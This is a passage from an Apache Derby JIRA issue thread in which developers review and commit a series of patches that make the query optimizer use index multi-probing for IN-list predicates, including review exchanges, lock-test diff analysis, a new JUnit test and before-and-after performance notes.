B. PredicateList.generateInListValues(): new method for generating the IN-list
values that will serve as the execution-time index "probe" values. This
method also generates a boolean to indicate whether or not the values
are already sorted (i.e. if we sorted them at compile time, which means
they all must have been constants).
2 - Adds code to ParameterNode that allows generation of a "place-holder" value (instead of the ParameterNode itself) for probe-predicates. This is required because a probe predicate has the form "column = ?" where the right operand is an internally generated parameter node that does not actually correspond to a user parameter. Since that parameter node is "fake" we can't really generate it; instead we need to be able to generate a legitimate ValueNode-
either a constant node or a "real" parameter node-to serve as the place-holder. The codeGen patch makes that possible.
3 - Updates the generateExpression() method of BinaryOperatorNode to account for situations where the optimizer chooses a plan for which a probe predicate is not a useful start/stop key and thus is not being used for execution-time index probing. In this case we simply "revert" the probe predicate back to the InListOperatorNode from which it was created. Or put another way, we "give up" on index multi-probing and simply generate the original IN-list as a regular restriction.
In creating this patch I realized that having the "revert" code in BinaryOperatorNode.generateExpression() is a "catch-all" for any probe predicates that are not "useful" for the final access path. So by doing the "revert" operation at code generation time we remove the need for the explicit "revertToSourceInList()" calls that I added to "modification of access paths" code in the previous patch (d47_CBO_MoAP). Since I could not see any benefit to reverting during MoAP vs. reverting at code gen time, I opted to go with the latter. So this patch also removes the now unnecessary "revertToSourceInList()" calls from PredicateList.java.
4 - Adds logic to NestedLoopJoinStrategy to generate a new type of result set, MultiProbeTableScanResultSet, for probing an index at execution time. The new result set does not yet exist (incremental development) but the code to generate such a result set is added as part of this patch. Note that we should never choose to do "multi-probing" for a hash join; comments explaining why are in the patch, along with a sanity assertion to catch any cases for which that might incorrectly happen.
5 - Adds a new method, "getMultiProbeTableScanResultSet()", to the ResultSetFactory interface. Also adds a corresponding stub method to GenericResultSetFactory. The latter is just a dummy method and will be filled in with the appropriate code as part of a subsequent patch.
I ran derbyall and suites.All on Red Hat Linux with ibm142 and there were no new failures. Reviews are appreciated, as always. If I hear no objections I will commit this patch in a couple of days.
Hi Army, just wanted to let you know that I've been reading your notes and reading the patches. If I have any concrete comments or suggestions, I'll barge in, but so far it's all looked quite good to me. I particularly want to thank you for taking the time to comment the code so clearly and thoroughly; it makes the world of difference to us code-readers.
Committed d47_mp_codeGen_v1.patch with svn # 515795:
URL:
And now attaching d47_mp_exec_v1.patch, which is a patch to implement execution-time "probing" given a probe predicate "place-holder" and a list of IN values. This patch creates a new execution-time result, MuliProbeTableScanResultSet, to perform the probing. Generally speaking the process is as follows, where "probe list" (aka "probeValues") corresponds to the IN list in question.
0 - Open a scan using the first value in the (sorted) probe list as a start AND stop key.
Then for each call to "getNextRowCore()":
1 - See if we have a row to read from the current scan position. If so, return that row (done).
2 - If there are no more rows to read from the current scan position AND if there are more
probe values to look at, then a) reopen the scan using the next probe value as the start/
stop key and b) go back to step 1. Otherwise proceed to step 3.
3 - Return null (no more rows).
At a higher-level the changes in exec_v1.patch make it so that repeated calls to MultiProbeTableScanResultSet.getNextRowCore() will first return all rows matching probeValues[0], then all rows matching probeValues[1], and so on (duplicate probe values are ignored). Once all matching rows for all values in probeValues have been returned, the call to getNextRowCore() will return null, thereby ending the scan.
In order to accommodate the above behavior, the following changes were made to existing files:
1 - Add correct instantiation logic to the "getMultiProbeTableScanResultSet()"
method of GenericResultSetFactory, which was just a stub method before this
patch.
2 - Overloaded methods in TableScanResultSet to allow the passing of a "probe value"
into the openScanController() and reopenScanController() methods. The methods
then use the probe value (if one exists) as the start/stop key for positioning
a scan, instead of using the start/stop key passed into the result set constructor.
3 - Made the iapi.types.DataType class implement the java.lang.Comparable interface
for the sake of easy sorting (just let the JVM do the sort). Since DataType (the
superclass of all datatypes and base implementation of the DataValueDescriptor
interface) already has a "compare()" method that returns an integer to indicate
less than, greater than, or equal, all we have to do is wrap that method inside
a "compareTo()" method and we're done.
There are two issues worth mentioning regarding this sort. First, the compareTo()
method does not throw any exceptions, so if an error occurs while trying to compare
two DataValueDescriptors, we will simply treat the values as "equal" when running
in insane mode (in sane mode we will throw an assertion failure). Is this
acceptable? If not, is there a better way to handle this, aside from writing my
own sorting code? (which is doable but seems like overkill).
Second, for some strange reason sorting the probeValues array directly (i.e.
in-place sort) leads to incorrect parameter value assignment when executing a
prepared statement multiple times. I was unable to figure out why that might
be (maybe related to
DERBY-827?). To get around the problem I create clones
of the IN values and then sort the clones. That solves the problem but has
the obvious drawback of extra memory requirements. I'm hoping that for now
this is an okay workaround (progress, not perfection), but if anyone has any
ideas as to what could be going on here, I'd appreciate the input.
And of course, if there are any other reasons why it's bad to make DataType
implement the Comparable interface, I hope that reviewers can speak up. If
it comes down to it I can always add a simple sort method to MultiProbeTSCRS
and just use that.
As with all preceding patches, this patch should not have any functional effect on Derby processing because the new behavior depends on probe predicates, which do not yet exist. I have not yet had a chance to run derbyall as a sanity check, but plan to do so before committing. In the meantime, questions/comments/feedback on exec_v1.patch as attached would be much appreciated.
I was reading through d47_mp_codeGen_v1.patch, and the
new getMultiProbeTableScanResultSet() method struck me as
somewhat awkward in having 26 arguments to the method. I see
you haven't actually implemented this method yet (or maybe you have;
I'm a patch-or-two behind
), so maybe it's possible to explore why
we ended up with 26 arguments here?
> maybe it's possible to explore why we ended up with 26 arguments here?
Good question, Bryan. The relevant code in codeGen_v1.patch is as follows:
+ /* If we're going to generate a list of IN-values for index probing
+ * at execution time then we push TableScanResultSet arguments plus
+ * two additional arguments: 1) the list of IN-list values, and 2)
+ * a boolean indicating whether or not the IN-list values are already
+ * sorted.
+ */
+ if (genInListVals)
{
+ numArgs = 26;
What that comment does not say is that the reason we use TableScanresultSet arguments plus 2 is that the new result set, MultiProbeTableScanResultSet, extends TableScanResultSet and depends on TableScanResultSet to do most of the work. Therefore we need all of the usual (24) arguments for TableScanResultSet , plus two additional arguments for logic specific to multi-probing. The latest patch, d47_mp_exec_v1.patch, includes the new MultiProbeTableScanResultSet class, which hopefully shows how things are expected to work.
> (or maybe you have; I'm a patch-or-two behind
),
Oops! My apologies. For some reason I took your previous comment to mean that you had already looked at the various patches up to and including codeGen_v1, and that you didn't have any suggestions. I see now that you were (perhaps?) indicating that you were in the process of looking at the patches but were not yet done.
Sorry for rushing on this one. I'll let the exec_v1 patch sit for a while (at least until Monday) to give you (and any other developers who may be in a similar situation) ample review time. I'll post again before I commit and if you have any feedback or else would like a few more days, feel free to say so.
I appreciate you looking at these patches and didn't mean to hurry or otherwise overlook your comments. Take all the time you need, and please continue to ask any questions you may have.
Thanks again for your time!
Thanks Army for the good explanation. I didn't realize that the calls to this 26-argument
method are generated. That makes a bit difference; I was worried about the complexity
of human beings writing and maintaining code which called the 26-argument method, but
if it's only called by generated code it's a totally different story.
I don't think you're rushing. Please keep on with the process as you've been doing it; if I
come up with anything of substance we can take a look at it at that time.
Bryan Pendleton (JIRA) wrote:
> I finally got around to reading through the patches. I haven't actually
> run any of the code, just given the patches a close reading
Thank you very much for taking the time to do such a thorough review, Bryan. I definitely appreciate the feedback. My attempted answers are below, but if anything is still unclear, please do not hesitate to ask again. Better to get this right the first time
>?
If we assume that we do in fact have a situation where "relop is null but in-list is not null", then pred.isRelationalOpPredicate() will, as you said, return false. That means that "!pred.isRelationalOpPredicate()" will return true, and since we are using a short-circuited OR operator, I don't think we would ever get to the pred.getRelop() call in that case, would we?
The intent was that we only get to the second part of the OR if we know for a fact that pred.getRelop() will return a non-null value. And if "pred" is a relational op predicate (i.e. if the first part of the OR evaluates to "false") then that should always be the case. It is of course possible that I missed something and that the code doesn't follow the intent; please let me know if you can think of such a case...
> 2) I spent some time studying the code in PredicateList.java which manipulates
> IN list operator predicates, and got a bit twisted around.
[ snip code fragment ]
> My naive reaction to code like this is "shouldn't this be handled in
> pred.getSourceInList()"?
Good point. When I was making the changes I wrote "getSourceInList()" specifically for the new probe predicates; I was just leaving the existing InListOperatorNode logic as it was. But you're right, it's probably cleaner to expand that method to cover the "old" IN-list cases, as well. I will look into this for a follow-up patch.
> Can you help me understand why are there these two different ways to get
> the InListOperatorNode for a predicate (via getSourceInList() and via
> getAndNode.getLeftOperand() ),
The former (getSourceInList()) was added to handle
DERBY-47 probe predicates while the latter (getAndNode.getLeftOperand()) was already there for handling the "normal" (pre DERBY-47) InLists. But you're right, it might be good to combine the two--I'll try to do that.
>?
Great catch! When I first wrote the
DERBY-47 changes I had all of the probing logic inside the TableScanResultSet class, and thus the additional arguments were always generated, even in cases where no probe predicates existed. I later realized that this was too much overhead since most TableScanResultSets will probably not be doing multi-probing. So I refactored the code and created a new result set, MultiProbeTableScanResultSet, which is only generated when probe predicates exist. But I forgot to remove the corresponding logic from the generateInListValues() method, hence the "else".
So you're absolutely right: the "else" clause can be removed here and the code can be cleaned up accordingly. I'll address that in a follow-up patch.
>?
This is just habit more than anything. A lot of the optimizer-related work that I've been doing requires the removal of certain predicates from predicate lists at various points in the code, and in that case reverse traversal is better (because removal of elements from the rear does not require adjustments to the loop index). So I often write loop iteration with backwards traversal out of sheer habit, even when removal of predicates is not happening. If you think this makes the code more confusing or less intuitive I have no problems with switching to forward travers.
Short answer is that I don't know what the commented out code is for, and my guess is that Yes, it can (and should) be cleaned up. But I frequently comment on other people's patches that they should refrain from making unrelated "cleanup" changes as it makes the patches harder to review, so I thought maybe I should follow my own advice
Feel free to commit this two-line cleanup as a separate patch if you'd like--or I can do it myself, as well. Either way, so long as its a separate commit, I think that's a good idea.
>.
There is an existing test case in lang/inbetween.sql that has such a test for "normal" (pre
DERBY-47) IN-list processing. The query in that case has 4056 values (constants) in it.
I was also looking at the repro attached to
DERBY-47, which generates and executes IN-lists with up to 2500 and more values. I'd like to pull out the relevant pieces and include them in a new JUnit test as a way to verify that thing works for large IN lists when multi-probing is in effect, as well. That's still a forthcoming patch. For the record, though, I ran the repro on a database with 100,000 rows in it and a single IN-list of 2500 values, and everything worked fine--even when multi-probing was in effect. This is as I would expect since the code to generate the IN-list is the same before and after my changes.
>.
Great observation.
>
This is a very valid point. I've been focusing on the first goal, but you're right, the above change is perhaps too costly. I'll look into remedying this with a follow-up patch...
Thank you again for these excellent review comments. I really (really) appreciate the extra pair of the eyes and the great suggestions. As I said above, if any of the above answers are unclear or unsatisfactory, please ask again--I'll try to explain whatever it is that may not make sense.
PS I plan to commit the exec_v1.plan patch later today (Monday) unless I hear objections from anyone...
Committed d47_mp_exec_v1.patch with svn 517470:
URL:
Attaching d47_mp_preprocess_v1.patch, which is (finally) the patch that actually creates "probe predicates" during preprocessing, thus allowing the code changes in all previous patches to take effect. Once this patch is committed Derby will start re-writing IN lists as probe predicates and, if the optimizer thinks it is best to do so, will start doing index "multi-probing" at execution time to avoid excessive scanning. The changes in this patch affect "preprocessing" logic as follow:
1. Replaces "A" with "B", where "A" is existing logic that creates a BETWEEN
node for IN-lists containing all constants, and "B" is new logic that
creates a "probe predicate" for IN-lists containing all constants and/or
parameter nodes. The probe predicates are then used throughout optimization,
modification of access paths, code generation, and execution time (as
appropriate) in the manner described by previous patches.
2. Adds some additional logic to OrNode preprocessing to allow the conversion
of queries like:
select ... from T1 where i in (2, 3) or i in (7, 10)
into queries that look like:
select ... from T1 where i in (2, 3, 7, 10)
This is really just an extension of the existing logic to transform a
chain of OR nodes into an IN-list.
3. Adds logic to PredicateList.pushExpressionsIntoSelect() to correctly
copy "probe predicates" so that the left operand (column reference)
is pointing to the correct place when we do static pushing of one-
sided predicates (which is what a "probe predicate" is).
4. Adds a new method to ValueNodeList that is used for checking to see if
a list of IN values consists solely of constant and/or parameter nodes
(there are no other expressions or column references).
I'm also attaching a corresponding patch, d47_mp_masters_v1.patch, which contains all of the diffs caused by the new multi-probing functionality. As is typical with tests that print out query plans, a simple change in the execution-time behavior can lead to massive diffs. I manually looked at all of the diffs in the masters_v1.patch and it is my belief that all but one of them are acceptable and expected given the changes for this issue. The one exception is for store/readlocks.sql, which is a test about which I know very little. My guess (or perhaps more accurately, my hope) is that this readlocks diff is okay, but it would be great if someone who knows more about it could verify.
Note that I've separated preprocess_v1.patch from masters_v1.patch for ease of review, but they both need to be committed at the same time in order to avoid failures in the nightly regression tests.
As always, I'd appreciate it if anyone has the time look these changes over and make comments. If there are no objections I plan to commit these two patches Wednesday afternoon (March 14th, PST).
Remaining tasks once preprocess_v1 is committed:
- Address the (excellent) review comments raised by Bryan in one or more
follow-up patches.
- Add test cases to verify that Derby is now behaving as desired in the
face of IN list restrictions on columns with useful indexes.
- Post some simple numbers to show the improvement that I see when running
Derby47PerformanceTest.java (attached to this issue) before and after
the changes for this issue. Also, discuss a couple of areas to investigate
DERBY-47(i.e. things to consider as separate Jira issues).
I'm hoping to have most of this work posted by the end of the week, but of course that all depends on the feedback I receive and the amount of other "stuff" that comes up between now and then.
Atttaching the readlocks diff with more context to hopefully help in reviewing...
Hi Army, I had a look at the preprocess and master patches and they look
good to me. Here's a couple small thoughts I had which you might want to
consider down the road.
0) You are right about the compound IF statement that we discussed in the
previous set of comments. I misread the logic, and I agree that there is
not any NPE hole there. Thanks for the further explanation.)
As I read the code near that comment, it didn't seem that you were actually
depending on the IN-list having more than one value. Rather, you were
choosing a data structure which could handle multiple values, but which can
handle a single value just as well.
But I thought I'd mention it just to be sure..
Does such a query generate and use the new style Multi-Probe processing?
3) Do you have any test cases in which the IN-list predicate references a
column in a UNION or a UNION view, thus requiring pushing the IN-list
predicate down and pulling it back up?.
5) I looked at the updated masters; to my eye they show that the new probe
predicate is working, and the optimizer is choosing to use index-to-base
processing for these predicates rather than the formerly-chosen table
scans, so this looks great to me.
6) I have no guidance to offer regarding the readlocks diff, sorry.? Or is
the only indication that the new probing code has been chosen the use of
the index in place of the table scan?
>)
Yes, an IN-list can only have a single value. However, if such an IN-list occurs we will convert it into an equality predicate as part of the first "if" branch in the preprocess() method:
/* Check for the degenerate case of a single element in the IN list.
- If found, then convert to "=".
*/
if (rightOperandList.size() == 1)
...
Thus we won't ever get to the code referenced above. But you're right, it might be good to add an explanatory comment to explain this.
>.
A few test cases for this kind of query already exist in lang/inbetween.sql and also in lang/subquery.sql. So I did not add any new test cases with my changes. Is there anything in particular you think could be problematic here?
> Does such a query generate and use the new style Multi-Probe processing?
No, it does not. Multi-probe processing only occurs if the IN-list is solely comprised of constant and/or parameter nodes. A subquery is neither constant nor parameter, hence no multi-probing will occur. The code for this is in the preprocess() method of InListOperatorNode:
else if ((leftOperand instanceof ColumnReference) &&
rightOperandList.containsOnlyConstantAndParamNodes())
> 3) Do you have any test cases in which the IN-list predicate references a
> column in a UNION or a UNION view, thus requiring pushing the IN-list
> predicate down and pulling it back up?
I added a few, simplified test queries for this situation to lang/inbetween.sql as part of d47_mp_addlTestCases.patch (under the heading "Nested queries with unions and top-level IN list"). There are also a handful of queries in lang/predicatePushdown.sql that include IN lists in addition to equality predicates. Feel free to comment if you think more testing should be done here...
>.
Oops, good catch
Just a typo, I will try to fix this up.
> 5) I looked at the updated masters; to my eye they show that the new probe
> predicate is working, and the optimizer is choosing to use index-to-base
> processing for these predicates rather than the formerly-chosen table
> scans, so this looks great to me.
Thank you for taking a look at these--this was an unexpected but very welcome review!
>?
This had occurred to me, as well, but then I realized that in all of the test cases the MultiProbingTableScanResultSet shows up as the child of an IndexToBaseRowResultSet, which I think means it doesn't actually get printed in the query plans (only the info for the IndexToBaseRowResultSet is printed). This is simliar, I think, to BulkTableScanResultSet, which is not printed in query plans, either (I don't think...I believe the only way to tell is by looking at the fetch size).
> Or is the only indication that the new probing code has been chosen the
> use of the index in place of the table scan?
Right now I think the only way to tell is to look at the use of index and the number of rows visited/qualified: if we used an index but did not do multi-probing, we will probably see far more rows visited than if we used multi-probing (that won't always be the case, but is generally true). Perhaps work to add an explicit indication of multi-probing to the query plan can be handled as a separate enhancement?
These are great observations and great questions--thank you for posing them! And if you have any others, please continue to ask. I'm definitely grateful for the feedback...
I took a look at the diffs in readlocks and I believe all are "correct" with respect to your changes. It looks to me like there is an existing bug not affected by your code, see case 6 below. The readlocks test runs the same set of tests through multiple
setups varying isolation level, rows size and unique vs. non-unique index. In all cases the diffs you are seeing are due to
a test of locks gotten from walking a cursor down the result set from: select a from a where a = 5 or a = 7' . As described it is expected that you IN logic change should apply to this query when there is an index on a. I have described what I think is happening in the diffs below, diff line numbers come from applying your master patch to a current codeline and then running svn diff.
Diff line notation is from a svn diff after applying the master patch
posted to
DERBY-47
1) diff lines:4946,7 +4946,7 @@^M
o diff ok
o before change first next would bulk load all rows leaving a "scan lock"
on the last page (3,1). Now on first next code does a probe for the
5 from the (a=5 or a=7), so first lock query shows scan lock on (2,1)
associated with 5. There are no real row locks as this is read
uncommitted test.
2) @@ -8103,6 +8103,7 @@^M
@@ -8112,6 +8113,7 @@^M
o diff ok, shows 1 more row lock after each next in an expected OR case
o before change first next would bulk load all rows and by time lock
query is executed all locks would be released due to read committed.
Now because of probing we only get locks as we probe each value and
test shows lock is held during next call and then released when we
next to the next value.
3) @@ -8956,6 +8958,7 @@^M
@@ -8965,6 +8968,7 @@^M
o diff ok, same reasoning as 2
4) @@ -11255,7 +11259,8 @@^
@@ -11265,6 +11270,7 @@^M
o diff ok, same reasoning as 2 - row numbers are different from 2 because
of different padding in test table.
5) @@ -12101,6 +12107,7 @@^M
@@ -12110,6 +12117,7 @@^M
o diff ok, same reasoning as 4
6) @@ -14746,7 +14754,6 @@^M
o I think there is a bug in existing code, the incremental diff looks ok.
o there should not be any locks left after the scan_cursor is closed in
read committed but there at line 14762 of original test.
7) @@ -15752,7 +15759,6 @@^M
o same as 6
8) @@ -18421,9 +18427,8 @@^M
o same as 6
9) @@ -19421,7 +19426,6 @@^M
o same as 6
10) @@ -21779,8 +21783,6 @@^M]
o diff ok!!
o this is a good test that shows that the new code only visits the 2 rows
of the or clause and does not get locks on any other rows under
serializable with a unique index.
Old change shows it scaning the range an unnecessarily
locking an extra row.
11) @@ -21791,7 +21793,6 @@^M
o diff ok
o same as 10
12) @@ -21799,7 +21800,6 @@^
o diff ok
o same as 10
13) @@ -22639,8 +22639,6 @@^M
o diff ok
o not as good a test as 10. Because of previous key locking and the very
small data set both before and after we lock the same number of rows.
Diff does show difference in processing between before and after. If
there had been more than one row between 5 and 7 with the non-unique
index it would have shown less rows locked under new code vs. old code.
Adding a test for "IN(1, 7)" would show this off. If you are going to
add new test I would suggest checking in current set of diffs and then
adding separate test as it is easier to identify diffs from
new tests.
14) @@ -24974,11 +24972,9 @@^M
o diff ok
o same as 13
15) @@ -25831,8 +25827,6 @@^M
o same as 13
In my writeup on the diffs, ignore the comments about there being a possible bug. I incorrectly thought those cases were
read committed cases but they actually were repeatable read cases. I was searching for the wrong string to determine where I was in the test.
All the diffs look fine and expected with army's changes.
Thanks again for the excellent review, Mike.
Unless I hear otherwise I plan to commit the preprocess patch later today, after incorporating Bryan's most recent comments. I will then work on the follow-up patch(es) to address Bryan's original set of review comments (thanks Bryan!).
And finally, I will try to add a new test to verify the functional changes. That said, I was hoping to add a new test to the regression suite based on Derby47PerformanceTest.java as attached to this issue. However, I just noticed that the attachment does not grant license to ASF for inclusion in ASF works.
James Synge, are you willing to grant such rights for the test program that you attached? If so, can you re-attach the file and check the appropriate box on the "Attach File" screen?
This is the same as the file I attached on 2006-09-06, but now with the license granted to ASF.
I made some slight modifications to the preprocess patch in accordance with Bryan's review comments, and then committed with svn #518322:
URL:
More specifically, preprocess_v2 differs from preprocess_v1 in that it:
1 - Adds a comment to help clarify what happens in the case of an IN-list with a single value in it.
2 - Renames "beon" to "bron" in OrNode.java to reflect the fact that it is a BinaryRelationalOperatorNode, not a BinaryEqualityOperatorNode.
derbyall ran cleanly on Red Hat Linux with ibm142.
Thanks again to Bryan and Mike for the reviews.
Attaching d47_mp_cleanup_v1.patch, which is a patch to address the review comments made by Bryan on 11/Mar/07 11:37 AM. In particular this patch does the following:
1 - Changes Predicate.isRelationalOpPredicate() so that it just calls
the already existing method "isRelationalOperator()" on the left
operand of the predicate's AND node. I.e.:
- return ((getRelop() != null) && (getSourceInList() == null));
+ return andNode.getLeftOperand().isRelationalOperator();
I completely forgot that the "isRelationalOperator()" method already
existed, even though I myself made probe-predicate-based changes to
that method as part of d47_mp_relOpPredCheck:
public boolean isRelationalOperator(){ - return true; + /* If this rel op is for a probe predicate then we do not call + * it a "relational operator"; it's actually a disguised IN-list + * operator. + */ + return (inListProbeSource == null); + }
As a result of those changes we can now just call that method when
checking to see if a predicate is a relational op predicate. This
ultimately comes down to a simple check for a null variable in
BinaryRelationalOperatorNode, as seen above.
I believe this change addresses Bryan's comment #7, which pointed
out that the old code:
return ((getRelop() != null) && (getSourceInList() == null));
seemed a tad expensive since it was replacing a simple call to
"relop != null". The new code (with this patch) is much more
comparable to the "relop != null" check in terms of "work" that
it does (we have an additional call to getLeftOperand(), but
that's about it).
2 - Inspired by the "isRelationalOperator()" method defined in ValueNode
and used above, I added a similar method, "isInListProbeNode()",
to ValueNode, as well. The default case returns "false", while
BinaryRelationalOperatorNode returns true if it has a source IN-
list associated with it:
+ /** @see ValueNode#isInListProbeNode */
+ public boolean isInListProbeNode()
+
Then I added a corresponding method called "isInListProbePredicate()"
to Predicate.java. This method allows for simple (and relatively
cheap) checking of a predicate to see if it is an IN-list probe
predicate. There are several places in the code where we would
attempt to retrieve the underlying source IN-list (via a call to
"getSourceInList()") just to see if it was non-null. All of those
occurrences have now been replaced by a call to the new method on
Predicate.java. I think this is a cleaner and cheaper way to
go about it.
3 - Modifies Predicate.getSourceInList() to return the underlying
InListOperatorNode for probe predicates AND for "normal"
IN-list predicates (i.e. an IN-list that could not be
transformed into a "probe predicate" because it contains
one or more non-parameter, non-constant values)
This then allowed for some cleanup of the code mentioned in
Bryan's comment #2. Some of the logic for that code was
specifically targeted for the old rewrite algorithm (use
of a BETWEEN operator), so I fixed it up and added comments
as I felt appropriate.
I also added a second version of getSourceInList() that takes a
boolean argument; if true, then it will only return the source
IN list for a predicate if that predicate is an IN-list
probe predicate.
4 - Changes PredicateList.generateInListValues() to account for the
fact that it only ever gets called when we know that there is
a probe predicate in the list. This addresses Bryan's review
comment #3.
5 - Shortens a couple of lines in FromBaseTable that were added with
earlier patches but were longer than 80 chars. Also rewrites
one Sanity check in that class to avoid construction of strings
when no error occurs (per recent discussions on derby-dev).
I ran derybyall and suites.All with ibm142 on Red Hat Linux with no new failures. Feedback or further review of these changes is appreciated. I'll plan to commit on Monday if I don't hear any objections.
Many many thanks again to Bryan for his time and suggestions!
Thanks for all the attention to detail, Army! The mp_cleanup_v1 patch looks very clean to me.
Thank you for the review of the cleanup patch, Bryan! I will continue with my plan to commit that patch before the end of day on Monday if no other comments come in.
I'm also attaching here a (final?) patch for this issue: d47_mp_junitTest_v1.patch, which creates a new JUnit test based on the repro program attached to this issue (thanks James Synge!). The test creates the same kind of table and data that Derby47PerformanceTest.java creates, and then runs three types of queries with larger and larger IN lists. The three types of queries are:
1 - "Markers" : same as in James' program
2 - "Literals" : same as in James' program
3 - 'MixedIds": IN list has a combination of parameter markers and literals.
For each query we check to make sure the results are correct and then we look at the query plan to determine whether or not the optimizer chose to do multi-probing. If the results are incorrect or if the optimizer did not choose multi-probing then the test will fail.
The test determines that "multi-probing" was in effect by looking at the query plan and verifying two things:
1. We did an index scan on the target table AND
2. The number of rows that "qualified" is equal to the number of rows that were actually returned for the query. If we did not do multi-probing then we would scan all or part of the index and then apply the IN-list restriction after reading the rows. That means that the number of rows "qualified" for the scan would be greater than the number of rows returned from the query. But if we do multi-probing we will just probe for rows that we know satsify the restriction, thus the number of rows that we "fetch" for the scan (i.e. "rows qualified") should exactly match the number of rows in the result set.
I ran the new test using ibm142, ibm15, jdk142, jdk15, jdk16, and weme6.1 and it passed in all cases.
I also ran the new test against a build that I created before any of the
DERBY-47 changes were committed; as expected, the test failed because even though the optimizer did chose to use an index, it scanned a lot (thousands) of extra rows for that index.
Any reviews/comments on the this new JUnit test are very much welcomed. In the absence of any feedback to the contrary, I'm thinking I'll commit this new test by the end of Monday, as well. And of course, comments/suggestions can still be made after that, if needed...
InListMultiProbeTest applied and built and passed in my environment. Looks good!
Thank you, Bryan, for taking a look at the new JUnit test and for verifying that it runs.
I committed the cleanup patch and the new JUnit tests with the following svn commits (respectively):
URL:
URL:
I'm marking the issue as "Resolved" in 10.3 since I believe this wraps up the changes for this issue. I plan to run some (simple) before-and-after numbers and post them tomorrow.
I will wait a few days to check for fallout and then I will close or re-open this issue accordingly.
For any of the people "watching" this issue, if you are willing and able to sync up with the latest trunk for testing only (do not use the trunk in production, nor on production databases!) and provide feedback on whether or not the changes for this issue address your concerns, that'd be great. If you are still experiencing problems even after these changes, you may need to file one or more additional Jira issues to address those specific problems. As it is, I think the work for this specific Jira issue is pretty much "done"...
Follow-up comments and feedback are of course always-
and greatly-welcomed.
Attaching a very simple document with some straightforward "before-and-after" measurements based on the Derby47PerformanceTest attached to this issue. I wrote this document pretty quickly so it's not very elegant, but it does show the improvement that I see from the
DERBY-47 changes. Here's the conclusion, pasted from the document:
<begin paste>
Conclusion:
From a "multi-probing" perspective these numbers show what we expect: namely, that we can save a lot of time by selectively probing an index for a list of values instead of scanning all (or large parts) of that index for a relatively small number of rows.
But there are a couple of areas that could use follow-up work. In particular:
1. As seen in this document, the compilation/optimization time for "Literals" is far larger than it is for "Markers". Since the "probe predicate" optimization in theory applies the same to both strategies, further investigation is needed to figure out what it is about "Literals" that makes for such a long compilation time. I do not currently have any theories as to what could be at the root of this. Note, though, that this relatively excessive compilation time was an issue even before the changes for
DERBY-47 were committed.
2. Not surprisingly, the costing logic for probing as implemented in
DERBY-47 is not perfect. It works great in situations where the IN list is significantly smaller than the number of rows in the table--ex. we see good results for 100k rows.).
My feeling is that any work related to investigation/resolution of these two issues can and should be completed as part of a new Jira...
<end paste>
Updated copy of the before-and-after numbers. This one actually tells what the numbers in the tables mean
Thanks for posting the measurement analysis, Army; it's good to see the numbers backing up
the results we hoped to see.
I agree that the two follow-up issues that you uncovered should be logged and pursued separately.
Army - Just FYI
In the Tuning Guide, the IN operator is mentioned in the optimization and query sections, as shown below:
DML statements and performance
Performance and optimization
Index use and access paths
Joins and performance
Derby's cost-based optimization
Locking and performance
Non-cost-based optimizations
Non-cost-based sort avoidance (tuple filtering)
The MIN() and MAX() optimizations
Overriding the default optimizer behavior
Internal language transformations
Predicate transformations
Static IN predicate transformations
Subquery processing and transformations
DISTINCT elimination in IN, ANY, and EXISTS subqueries
IN/ANY subquery transformation
It is not clear to me if the Optimization section needs to be updated with any info about improvements to the IN optimization.
But I wanted to provide you with this info so that you can decide.
Hi Army, I just checked in a converted JUnit test for the old distinct.sql. All the fixtures in the test had been working, until I updated to get the new RuntimeStatisticsParser so I could use it in the test, and then one fixture started failing with an ASSERT related to
DERBY-47. I was hoping if you have some spare time that you might be able to take a look at it and see if you can figure out what's going on a little quicker than I. Look for and uncomment the testResultSetInOrderWhenUsingIndex() in the new DistinctTest class. Pardon the confusing name, its taken directly from the comment that proceeds the old test in the .sql file, so I kept it as the method name for the test fixture.
The really confusing thing to me is why the identical 'prepare as ...' with an identical select statement isn't getting the assert when the .sql test is running under the old harness.
I've probably just missed something subtle from the old test, and maybe another pair of eyes will help me spot what that is.
Hi Andrew,
Thank you for reporting this! My guess is that the difference between the JUnit test and the old distinct.sql is the specification of certain properties for the old test--namely:
derby.optimizer.optimizeJoinOrder=false
derby.optimizer.noTimeout=true
derby.optimizer.ruleBasedOptimization=true
When I specified these three properties on the command line for the JUnit test, all fixtures ran as expected. I then narrowed the failure that you're seeing down to the "optimizeJoinOrder" property: if it's not specified--i.e. if optimization of join orders occurs "as normal", the test fails. It only passes if optimizeJoinOrder is false.
So that's good news for you--you know why the problem is occuring. And I think it means you found a bug somewhere with
DERBY-47, too...so thank you!
I will look into this...
Hah! I had already deleted all the properties files for the old tests in my client so it didn't occur to me to look there. A fortunate oversight, then, I suppose.
Two questions then
1. shall I open a new issue for the test failure? If so, I'll be glad to, or we can roll it in to
DERBY-2491.
2. should I add the other two properties to the new test run? Adding the noTimeout flag doesn't significantly increase the amount of time the test takes to run. I'm not clear on what the ruleBasedOptimization flag does. Does that instruct the optimizer to not attempt the normal cost-based optimization and only do some rule-based optimization? The test runs (and passes) in a normal amount of time with or without this property set and noTimeout = true.
> 1. shall I open a new issue for the test failure?
Yes, I think that'd be good. Note though that this is an actual engine bug, not just a test problem. So it'd be good to make that clear in the new issue. The test case can serve as a repro for the engine bug.
> 2. should I add the other two properties to the new test run?
First I should mention that the full list of properties for this test includes:
derby.infolog.append=true
derby.optimizer.optimizeJoinOrder=false
derby.optimizer.noTimeout=true
derby.optimizer.ruleBasedOptimization=true
derby.language.statementCacheSize=1000
As for which of these are required, ummm....I don't know. My assumption is that the properties were added for specific reasons, but without corresponding comments it's hard to tell. Generally speaking any test for which we need to verify all or part of a query plan uses "noTimeout=true" to ensure that we get the same plan regardless of platform or machine speed. So it might be worth it to keep that one. But it'll have to be your call for the rest of them...
> I'm not clear on what the ruleBasedOptimization flag does. Does that instruct the optimizer to not attempt the normal
> cost-based optimization and only do some rule-based optimization?
Yes, that's exactly what it does. But that said, I know practically nothing about rule-based optimization, and I don't know why that particular property was added for the old distinct.sql test. Maybe you can do some investigating there to figure it out....and if not...well, like I said, it's your call
Army> Note though that this is an actual engine bug, not just a test problem. So it'd be good to make that clear in the new issue.
Agreed. I have a (bad?) tendency to overload JIRA issues by fixing everything that comes along whilst working on that one issue. Opened
DERBY-2500 for this new one.
As for the other properties you listed, I can't see how any of those would affect how the test runs, with the exception of noTimeout and ruleBasedOptimization, since they might affect the query plans in the runtime statistics. But, since the tests complete in a reasonable amount of time with noTimeout=true I'll leave that in, and since all the tests pass with or without ruleBasedOptimization set to true, I'll leave that off. Not really worth investigating, since it seems to have no effect on the new test.
The issue filed by Andrew (
